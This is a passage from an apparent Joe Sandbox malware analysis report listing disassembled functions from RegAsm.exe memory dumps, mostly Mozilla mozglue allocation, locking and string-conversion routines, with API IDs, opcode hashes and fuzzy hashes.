                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$memset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 837921583-0
                                                                                                                                                                                                                                                    • Opcode ID: 027b2987374e4a27b3db7d7bbea8fc8199db7d4623bd054d96b33692ac83ed6b
                                                                                                                                                                                                                                                    • Instruction ID: 2dbfeaa63a9a52c9df7a3c4b7bb0a227236a84e2f525a25e25255ee591024305
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 027b2987374e4a27b3db7d7bbea8fc8199db7d4623bd054d96b33692ac83ed6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F321C231B0924D8BEF04CF66DA48BBE73B9BF45708F980538E509A7A40DF35A9148BD0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72CDA4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                      • Part of subcall function 6C72D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C72CDBA,00100000,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72D158
                                                                                                                                                                                                                                                      • Part of subcall function 6C72D130: InitializeConditionVariable.KERNEL32(00000098,?,6C72CDBA,00100000,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72D177
                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72CDC4
                                                                                                                                                                                                                                                      • Part of subcall function 6C727480: ReleaseSRWLockExclusive.KERNEL32(?,6C721385,?,?,?,?,6C721385,?), ref: 6C7274EB
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72CECC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                      • Part of subcall function 6C71CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C72CEEA,?,?,?,?,00000000,?,6C71DA31,00100000,?,?,00000000), ref: 6C71CB57
                                                                                                                                                                                                                                                      • Part of subcall function 6C71CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C71CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C72CEEA,?,?), ref: 6C71CBAF
                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72D058
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 861561044-0
                                                                                                                                                                                                                                                    • Opcode ID: 89bdffaa4f136fe1c0b3488aedeefeb92076bbf9e22499d615d179bc0e0a5d64
                                                                                                                                                                                                                                                    • Instruction ID: e6125b552550789a1d331b33ad41e9ef1b871470cf09867675937b27d1da7cf4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89bdffaa4f136fe1c0b3488aedeefeb92076bbf9e22499d615d179bc0e0a5d64
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5D18F71A04B469FD718CF28C580B99F7E1FF99308F01862DD8598B752EB31E9A5CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6E17B2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C6E18EE
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E1911
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6E194C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3725304770-0
                                                                                                                                                                                                                                                    • Opcode ID: 928aef47cdb76f3b34c41e4154259cff51ecb6061d393bd6e12b75dec896e157
                                                                                                                                                                                                                                                    • Instruction ID: fe446e6379fdf5e2cfac66db00125af835211a9db0cda4e0991dd903026d0cfe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 928aef47cdb76f3b34c41e4154259cff51ecb6061d393bd6e12b75dec896e157
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2481D470A162059FCB08CF68D8949EEBBB1FF8D314F04452EE851AB755D730E845CBA6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6F5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6F5DB4
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F5DED
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 557828605-0
                                                                                                                                                                                                                                                    • Opcode ID: d9a272d51740fd71c0a0b704a125c94ef10bfa9ee0801b52a6d1054d276a513e
                                                                                                                                                                                                                                                    • Instruction ID: af94377728ae9bd41e64967e4f4fbd6a58e4a700f03e1c8c66fe7aa887314d7d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9a272d51740fd71c0a0b704a125c94ef10bfa9ee0801b52a6d1054d276a513e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72515E71E011198FDF08CF68C854ABEBBF2FB89304F598629D865A7791CB306D46CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C737170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C737250
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C737277
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7372C4
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C7372F7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 557828605-0
                                                                                                                                                                                                                                                    • Opcode ID: 1fc93872922245a60b9f441f29fd7daaa232e177325e882835ea721f8f8c0e87
                                                                                                                                                                                                                                                    • Instruction ID: f72de82b40e91d59258e50977019095c1562a7837a0751f91901b764eaa80eda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fc93872922245a60b9f441f29fd7daaa232e177325e882835ea721f8f8c0e87
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38517071E01129CFCF08CFA8CA94ABEB7B1FB89304F598629D855B7791CB306945CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6DCEBD
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C6DCEF5
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C6DCF4E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                    • Opcode ID: 21db32e88398dc5b1ce5aa0311ddbac519d57c7530d91ecb4251a14d3f76df08
                                                                                                                                                                                                                                                    • Instruction ID: e8b37834a4e32f8e8e7427c24575b3a78ffffd5192ea9cf90a0cdc74852c1f67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21db32e88398dc5b1ce5aa0311ddbac519d57c7530d91ecb4251a14d3f76df08
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD51F375A0025A8FCB04CF18C890A9AF7B5EF99304F29859DD85A5F351D731BD06CBE0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7377D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7377FA
                                                                                                                                                                                                                                                    • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C737829
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C6D31A7), ref: 6C70CC45
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C6D31A7), ref: 6C70CC4E
                                                                                                                                                                                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C73789F
                                                                                                                                                                                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7378CF
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6D4E5A
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6D4E97
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C713EBD,6C713EBD,00000000), ref: 6C6D42A9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2525797420-0
                                                                                                                                                                                                                                                    • Opcode ID: 6e9ad430ae52f791148ba54c601c4a03c69b30bfb88248fe5f2de08ea3a0e1f8
                                                                                                                                                                                                                                                    • Instruction ID: 4a2f63dbc3a75397a7529c993991bdb1956387693ced290776486d6eb16e7567
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e9ad430ae52f791148ba54c601c4a03c69b30bfb88248fe5f2de08ea3a0e1f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941AD719047469FD300DF29C48056BFBF4FF8A264F604A2EE4A987681DB70E959CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410430 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410452
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000001), ref: 00410460
                                                                                                                                                                                                                                                    • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410498
                                                                                                                                                                                                                                                      • Part of subcall function 004112B0: GetProcessHeap.KERNEL32(00000000,?,?,004104CB,00000000,?,?,00000001), ref: 004112BD
                                                                                                                                                                                                                                                      • Part of subcall function 004112B0: HeapFree.KERNEL32(00000000,?,004104CB,00000000,?,?,00000001), ref: 004112C4
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 004104E2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 837085947-0
                                                                                                                                                                                                                                                    • Opcode ID: bc3d8bcf357b5ebf29b8bba91ce68af02af43dc0f5aab703fe959e51c7a43a89
                                                                                                                                                                                                                                                    • Instruction ID: 91720d5dd55cc4c1e44be56f7e63d9c42e352323a96f1c0e324b3864d1ef0587
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc3d8bcf357b5ebf29b8bba91ce68af02af43dc0f5aab703fe959e51c7a43a89
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B221F532E0112867C7209B59AC80AFF7769EF45724F1401BBEE08D6201E6798ED586DD
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C716470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000200), ref: 6C71649B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200), ref: 6C7164A9
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: GetCurrentThreadId.KERNEL32 ref: 6C70FA8D
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: AcquireSRWLockExclusive.KERNEL32(6C75F448,?,6C70FA1F,?,?,6C6E5407), ref: 6C70FA99
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 6C71653F
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C71655A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3596744550-0
                                                                                                                                                                                                                                                    • Opcode ID: c71b7cae85d565713948b914f81aaa248f65a9d2834cafbf48dcfe580f34c6f3
                                                                                                                                                                                                                                                    • Instruction ID: 8f619aa431af94e668f77b26e68a6a6e9a5ba169d456b99dca45ec3643156d99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c71b7cae85d565713948b914f81aaa248f65a9d2834cafbf48dcfe580f34c6f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B31A2B5A083059FD700CF14D984A9EBBF4FF89314F50842EE89A87740DB34EA09CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C70FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?), ref: 6C70FFD3
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?,?), ref: 6C70FFF5
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?), ref: 6C71001B
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?,?), ref: 6C71002A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 826125452-0
                                                                                                                                                                                                                                                    • Opcode ID: 0a609738033e9d3ea3c122c1715b3e59aacf57d9abd224614d58c902b4717117
                                                                                                                                                                                                                                                    • Instruction ID: cec4aed5ccd5ca9b435c41a16082a4bf4c30f07d6b3a44b821c7ea36b551abc7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a609738033e9d3ea3c122c1715b3e59aacf57d9abd224614d58c902b4717117
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721F4B2B002155FC7089E789D848AAB7EAFBC53243294338E425D7781EA30AD018395
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6EB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6EB4F5
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6EB502
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6EB542
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6EB578
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
